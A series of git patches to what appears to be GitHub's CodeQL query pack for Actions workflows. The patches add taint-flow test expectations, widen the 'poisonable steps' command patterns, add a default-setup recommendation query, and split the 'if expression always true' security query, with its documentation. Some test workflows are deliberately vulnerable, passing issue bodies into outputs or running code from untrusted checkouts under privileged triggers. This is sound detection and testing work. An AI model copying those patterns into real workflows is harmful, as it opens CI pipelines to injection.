.github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | @@ -586,6 +593,15 @@ nodes | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | semmle.label | Uses Step: parse | | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | semmle.label | steps.parse.outputs.payload | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | semmle.label | Uses Step: parse | +| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | semmle.label | steps.parse.outputs.data | +| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | semmle.label | toJSON(steps.parse.outputs.data) | +| .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | semmle.label | Run Step: read_issue_body [body] | +| .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | semmle.label | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | semmle.label | Uses Step: parse [data] | +| .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | semmle.label | steps.read_issue_body.outputs.body | +| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | semmle.label | steps.parse.outputs.data | +| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | semmle.label | toJSON(steps.parse.outputs.data) | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 45b75470163844bba676e54b7ee138980f374bb3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 31 Oct 2024 13:38:38 +0100 Subject: [PATCH 656/707] chore: clean up partial.ql debug query --- ql/src/Debug/partial.ql | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql index c1578220b6be..cb8ba7873d8c 100644 --- a/ql/src/Debug/partial.ql +++ b/ql/src/Debug/partial.ql @@ -18,9 +18,7 @@ import PartialFlow::PartialPathGraph private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - //source.getLocation().getFile().getBaseName() = "non-existant-test.yml" - source.getLocation().getFile().getBaseName() = "test16.yml" and - source.getLocation().getStartLine() = 125 + source.getLocation().getFile().getBaseName() = "non-existant-test.yml" } predicate isSink(DataFlow::Node sink) { none() } From c6048a6fa1d7bfb558b9b147aaf790b72248d81b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 31 Oct 2024 14:16:56 +0100 Subject: [PATCH 657/707] tests: Update tests --- ql/test/library-tests/test.expected | 2 ++ 1 file changed, 2 insertions(+) diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 8d3e4193c69c..a8cf50334ce4 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -1559,6 +1559,7 @@ sources | martinhaintz/ga-file-list | * | output.file_names | filename | manual | | martinhaintz/ga-file-list | * | output.files | filename | manual | | peter-murray/issue-body-parser-action | * | output.* | text | manual | +| peter-murray/issue-forms-body-parser | * | output.payload | text | manual | | potiuk/get-workflow-origin | * | output.sourceHeadBranch | branch | manual | | puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | | redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | @@ -1703,6 +1704,7 @@ summaries | tmelliottjr/extract-regex-action | * | input.input | output.resultArray | taint | manual | | tmelliottjr/extract-regex-action | * | input.input | output.resultString | taint | manual | | traversals-analytics-and-intelligence/file-reader-action | * | artifact | output.content | taint | manual | +| zentered/issue-forms-body-parser | * | input.body | output.data | taint | manual | | zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | needs | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | From 230b2ff4d8773354ffc16e82898ac99b605202bd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 31 Oct 2024 14:17:44 +0100 Subject: [PATCH 658/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f5f8abdce209..d087f03b1526 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.82 +version: 0.1.83 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index c0f849e1f3e1..073ddf5b4577 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.82 +version: 0.1.83 groups: [actions, queries] suites: codeql-suites extractor: javascript From 0b7de6e86aa32a07856e0992c005658497e85f28 Mon Sep 17 00:00:00 2001 From: Brandon Stewart <20469703+boveus@users.noreply.github.com> Date: Thu, 31 Oct 2024 15:28:55 +0000 Subject: [PATCH 659/707] add rule to detect if default setup would be more appropriate --- ...efaultableCodeQLInitiatlizeActionQuery.qll | 36 ++++++++++ .../CodeQL/UnnecessaryUseOfAdvancedConfig.ql | 15 ++++ .../workflows/defaultable_workflow.yml | 70 +++++++++++++++++++ .../should_be_using_advanced_setup.yml | 41 +++++++++++ .../UnnecessaryUseOfAdvancedConfig.actual | 1 + .../UnnecessaryUseOfAdvancedConfig.expected | 1 + .../UnnecessaryUseOfAdvancedConfig.qlref | 1 + 7 files changed, 165 insertions(+) create mode 100644 ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll create mode 100644 ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql create mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml create mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml create mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual create mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected create mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref diff --git a/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll b/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll new file mode 100644 index 000000000000..ddec858aa62e --- /dev/null +++ b/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll @@ -0,0 +1,36 @@ +private import actions + +/** + * Holds if workflow step uses the github/codeql-action/init action with no customizations. + * e.g. + * - name: Initialize + * uses: github/codeql-action/init@v2 + * with: + * languages: ruby, javascript + * + */ + +class DefaultableCodeQLInitiatlizeActionQuery extends UsesStep { + DefaultableCodeQLInitiatlizeActionQuery() { + this.getCallee() = "github/codeql-action/init" and + not customizedWorkflowStep(this) + } +} + +/** + * Holds if the with: part of the workflow step contains any arguments for with: other than "languages". + * e.g. + * - name: Initialize CodeQL + * uses: github/codeql-action/init@v3 + * with: + * languages: ${{ matrix.language }} + * config-file: ./.github/codeql/${{ matrix.language }}/codeql-config.yml + * + */ + +predicate customizedWorkflowStep(UsesStep codeQLInitStep) { + exists(string arg | + exists(codeQLInitStep.getArgument(arg)) and + arg != "languages" + ) +} \ No newline at end of file diff --git a/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql b/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql new file mode 100644 index 000000000000..c2259473b9cd --- /dev/null +++ b/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql @@ -0,0 +1,15 @@ +/** + * @name Workflow Should Use Default Setup + * @description Workflows should use CodeQL Action with default setup instead of advanced configuration if there are no customizations + * @kind problem + * @problem.severity recommendation + * @precision high + * @id actions/unnecessary-use-of-advanced-config + * @tags actions + * maintainability + */ + +import codeql.actions.Violations_Of_Best_Practices.DefaultableCodeQLInitiatlizeActionQuery + +from DefaultableCodeQLInitiatlizeActionQuery action +select action, "CodeQL Action could use default setup instead of advanced configuration." \ No newline at end of file diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml b/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml new file mode 100644 index 000000000000..31f43d8b8b29 --- /dev/null +++ b/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml @@ -0,0 +1,70 @@ +# For most projects, this workflow file will not need changing; you simply need +# to commit it to your repository. +# +# You may wish to alter this file to override the set of languages analyzed, +# or to provide custom queries or build logic. +# +# ******** NOTE ******** +# We have attempted to detect the languages in your repository. Please check +# the `language` matrix defined below to confirm you have the correct set of +# supported CodeQL languages. +# +name: 'CodeQL' + +on: + push: + branches: [main] + pull_request: + # The branches below must be a subset of the branches above + branches: [main] + schedule: + - cron: '16 2 * * 5' + +jobs: + analyze: + name: Analyze + runs-on: ubuntu-latest + permissions: + actions: read + contents: read + security-events: write + + strategy: + fail-fast: false + matrix: + language: ['javascript'] + # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python', 'ruby' ] + # Learn more about CodeQL language support at https://git.io/codeql-language-support + + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + # Initializes the CodeQL tools for scanning. + - name: Initialize CodeQL + uses: github/codeql-action/init@v3 + with: + languages: ${{ matrix.language }} + # If you wish to specify custom queries, you can do so here or in a config file. + # By default, queries listed here will override any specified in a config file. + # Prefix the list here with "+" to use these queries and those in the config file. + # queries: ./path/to/local/query, your-org/your-repo/queries@main + + # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). + # If this step fails, then you should remove it and run the build manually (see below) + - name: Autobuild + uses: github/codeql-action/autobuild@v3 + + # â„¹ï¸ Command-line programs to run using the OS shell. + # 📚 https://git.io/JvXDl + + # âœï¸ If the Autobuild fails above, remove it and uncomment the following three lines + # and modify them (or add more) to build your code if your project + # uses a compiled language + + #- run: | + # make bootstrap + # make release + + - name: Perform CodeQL Analysis + uses: github/codeql-action/analyze@v3 diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml b/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml new file mode 100644 index 000000000000..e736d567773b --- /dev/null +++ b/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml @@ -0,0 +1,41 @@ +name: 'CodeQL' + +on: + push: + branches: ['master'] + pull_request: + branches: ['master'] + +permissions: + actions: read + contents: read + packages: read + security-events: write + +jobs: + analyze: + name: Analyze + runs-on: ${{ matrix.os }} + strategy: + fail-fast: false + matrix: + include: + - language: javascript + os: ubuntu-22.04 + - language: ruby + os: ubuntu-22.04-16core + + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + - name: Initialize CodeQL + uses: github/codeql-action/init@v3 + with: + languages: ${{ matrix.language }} + config-file: ./.github/codeql/${{ matrix.language }}/codeql-config.yml + + - name: Perform CodeQL Analysis + uses: github/codeql-action/analyze@v3 + with: + category: codeql/${{ matrix.language }}/full diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual new file mode 100644 index 000000000000..3c8904a86af1 --- /dev/null +++ b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual @@ -0,0 +1 @@ +| .github/workflows/defaultable_workflow.yml:44:9:55:6 | Uses Step | CodeQL Action could use default setup instead of advanced configuration. | diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected new file mode 100644 index 000000000000..3c8904a86af1 --- /dev/null +++ b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected @@ -0,0 +1 @@ +| .github/workflows/defaultable_workflow.yml:44:9:55:6 | Uses Step | CodeQL Action could use default setup instead of advanced configuration. | diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref new file mode 100644 index 000000000000..75a8fe2398a6 --- /dev/null +++ b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref @@ -0,0 +1 @@ +Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql \ No newline at end of file From ea20e9b33702be6a499b992c5f534e425d4cfcf8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 3 Nov 2024 22:29:20 +0100 Subject: [PATCH 660/707] fix: Add versioned python binaries to poisonable steps --- ql/lib/ext/config/poisonable_steps.yml | 6 +++--- .../Security/CWE-829/.github/workflows/test4.yml | 1 + .../Security/CWE-829/.github/workflows/test7.yml | 1 + .../Security/CWE-829/UntrustedCheckoutCritical.expected | 9 ++++++--- 4 files changed, 11 insertions(+), 6 deletions(-) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index e32bc48a9832..2f03b94b4027 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -47,8 +47,8 @@ extensions: - ["poetry"] - ["pylint"] - ["pytest"] - - ["python\\s+-m\\s+pip\\s+install\\s+-r"] - - ["python\\s+-m\\s+pip\\s+install\\s+--requirement"] + - ["python[\\d\\.]*\\s+-m\\s+pip\\s+install\\s+-r"] + - ["python[\\d\\.]*\\s+-m\\s+pip\\s+install\\s+--requirement"] - ["rake"] - ["rails\\s+db:create"] - ["rails\\s+assets:precompile"] @@ -69,7 +69,7 @@ extensions: - ["(\\.\\s+[^\\s]+)\\b", 1] # eg: . venv/bin/activate - ["(source|sh|bash|zsh|fish)\\s+([^\\s]+)\\b", 2] - ["(node)\\s+([^\\s]+)(\\.js|\\.ts)\\b", 2] - - ["(python)\\s+([^\\s]+)\\.py\\b", 2] + - ["(python[\\d\\.]*)\\s+([^\\s]+)\\.py\\b", 2] - ["(ruby)\\s+([^\\s]+)\\.rb\\b", 2] - ["(go)\\s+(generate|run)\\s+([^\\s]+)\\.go\\b", 3] - ["(dotnet)\\s+([^\\s]+)\\.csproj\\b", 2] diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml index a07f2922fd7a..f82f493cd6e0 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml @@ -44,3 +44,4 @@ jobs: uses: actions/upload-pages-artifact@v1 with: path: './workspaces/www/build' + - run: python2.7 foo.py diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml index 44f5602ee061..7466cb4435d3 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml @@ -56,3 +56,4 @@ jobs: echo "$processed" >> $GITHUB_OUTPUT echo "BENCHEOF" >> $GITHUB_OUTPUT shell: bash + - run: python2.7 foo.py diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 85c2529c54c3..ec3841c23840 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -189,7 +189,8 @@ edges | .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | | .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | | .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | -| .github/workflows/test4.yml:42:7:43:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:42:7:43:4 | Run Step | .github/workflows/test4.yml:43:7:47:4 | Uses Step | +| .github/workflows/test4.yml:43:7:47:4 | Uses Step | .github/workflows/test4.yml:47:7:47:28 | Run Step | | .github/workflows/test5.yml:13:9:28:6 | Uses Step: issue | .github/workflows/test5.yml:28:9:32:6 | Uses Step | | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | | .github/workflows/test5.yml:39:9:54:6 | Uses Step: issue | .github/workflows/test5.yml:54:9:58:6 | Uses Step | @@ -202,7 +203,8 @@ edges | .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | -| .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | +| .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | +| .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | .github/workflows/test7.yml:59:9:59:30 | Run Step | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | @@ -342,7 +344,8 @@ edges | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | pull_request_target | | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:59:9:59:30 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:59:9:59:30 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | | .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | pull_request_target | | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | | .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | From 80f2b24eebe308d7042405ac3b18478097aa69f6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 3 Nov 2024 22:29:50 +0100 Subject: [PATCH 661/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index d087f03b1526..d34dad6665c8 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.83 +version: 0.1.84 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 073ddf5b4577..007c2ebbe95d 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.83 +version: 0.1.84 groups: [actions, queries] suites: codeql-suites extractor: javascript From db6f174b79161f1197d95d94864b6f323f20a7de Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 4 Nov 2024 10:10:47 +0100 Subject: [PATCH 662/707] query: split if expression is always true query critical - if the if statement contains a known control check high - otherwise --- ...e.md => ExpressionIsAlwaysTrueCritical.md} | 0 ...e.ql => ExpressionIsAlwaysTrueCritical.ql} | 17 ++- .../CWE-571/ExpressionIsAlwaysTrueHigh.md | 63 ++++++++++ .../CWE-571/ExpressionIsAlwaysTrueHigh.ql | 29 +++++ .../.github/workflows/{test.yml => test1.yml} | 2 +- .../CWE-571/.github/workflows/test2.yml | 111 ++++++++++++++++++ .../CWE-571/ExpressionIsAlwaysTrue.expected | 11 -- .../CWE-571/ExpressionIsAlwaysTrue.qlref | 1 - .../ExpressionIsAlwaysTrueCritical.expected | 11 ++ .../ExpressionIsAlwaysTrueCritical.qlref | 1 + .../ExpressionIsAlwaysTrueHigh.expected | 11 ++ .../CWE-571/ExpressionIsAlwaysTrueHigh.qlref | 1 + 12 files changed, 236 insertions(+), 22 deletions(-) rename ql/src/Security/CWE-571/{ExpressionIsAlwaysTrue.md => ExpressionIsAlwaysTrueCritical.md} (100%) rename ql/src/Security/CWE-571/{ExpressionIsAlwaysTrue.ql => ExpressionIsAlwaysTrueCritical.ql} (51%) create mode 100644 ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md create mode 100644 ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql rename ql/test/query-tests/Security/CWE-571/.github/workflows/{test.yml => test1.yml} (97%) create mode 100644 ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml delete mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected delete mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref create mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected create mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref create mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected create mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.md similarity index 100% rename from ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md rename to ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.md diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql similarity index 51% rename from ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql rename to ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql index 58eab4c60222..6eaaca6e05db 100644 --- a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql @@ -1,27 +1,26 @@ /** - *: - * * @name If expression always true * @description Expressions used in If conditions with extra spaces are always true. * @kind problem * @security-severity 9.0 * @problem.severity error - * @precision high - * @id actions/if-expression-always-true + * @precision very-high + * @id actions/if-expression-always-true/critical * @tags actions * maintainability * external/cwe/cwe-275 */ import actions +import codeql.actions.security.ControlChecks -from If i +from ControlCheck i where - i.getCondition().matches("%${{%") and + i.(If).getCondition().matches("%${{%") and ( - not i.getCondition().matches("${{%") or - not i.getCondition().matches("%}}") + not i.(If).getCondition().matches("${{%") or + not i.(If).getCondition().matches("%}}") ) or - count(i.getCondition().splitAt("${{")) > 2 + count(i.(If).getCondition().splitAt("${{")) > 2 select i, "Expression always evaluates to true" diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md new file mode 100644 index 000000000000..1e7ea120cbaa --- /dev/null +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md @@ -0,0 +1,63 @@ +# If Condition Always Evaluates to True + +## Description + +GitHub Workflow Expressions (`${{ ... }}`) used in the `if` condition of jobs or steps must not contain extra characters or spaces. Otherwise, the condition is invariably evaluated to `true`. + +When an `if` condition erroneously evaluates to `true`, unintended steps may be executed, leading to logic bugs and potentially exposing parts of the workflow designed to run only in secure scenarios. This behavior subverts the intended conditional logic of the workflow, leading to potential security vulnerabilities and unintentional consequences. + +## Recommendation + +To avoid the vulnerability where an `if` condition always evaluates to `true`, it is crucial to eliminate any extra characters or spaces in your GitHub Actions expressions: + +1. Do not use `${{` and `}}` for Workflow Expressions in `if` conditions. +2. Avoid multiline or spaced-out conditional expressions that might inadvertently introduce unwanted characters or formatting. +3. Test the workflow to ensure the `if` conditions behave as expected under different scenarios. + +## Examples + +### Correct Usage + +1. Omit `${{` and `}}` in `if` conditions: + + ```yaml + if: steps.checks.outputs.safe_to_run == true + if: |- + steps.checks.outputs.safe_to_run == true + if: | + steps.checks.outputs.safe_to_run == true + ``` + +2. If using `${{` and `}}` Workflow Expressions, ensure the `if` condition is formatted correctly without extra spaces or characters: + + ```yaml + if: ${{ steps.checks.outputs.safe_to_run == true }} + if: |- + ${{ steps.checks.outputs.safe_to_run == true }} + ``` + +### Incorrect Usage + +1. Do not mix Workflow Expressions with un-delimited expressions: + + ```yaml + if: ${{ steps.checks.outputs.safe_to_run }} == true + ``` + +2. Do not include trailing new lines or spaces: + + ```yaml + if: | + ${{ steps.checks.outputs.safe_to_run == true }} + if: > + ${{ steps.checks.outputs.safe_to_run == true }} + if: " ${{ steps.checks.outputs.safe_to_run == true }}" + if: |+ + ${{ steps.checks.outputs.safe_to_run == true }} + if: >+ + ${{ steps.checks.outputs.safe_to_run == true }} + ``` + +## References + +- [Expression Always True Github Issue](https://github.com/actions/runner/issues/1173) diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql new file mode 100644 index 000000000000..6b0c69977612 --- /dev/null +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql @@ -0,0 +1,29 @@ +/** + * @name If expression always true + * @description Expressions used in If conditions with extra spaces are always true. + * @kind problem + * @problem.severity error + * @precision high + * @security-severity 7.5 + * @id actions/if-expression-always-true/high + * @tags actions + * maintainability + * external/cwe/cwe-275 + */ + +import actions +import codeql.actions.security.ControlChecks 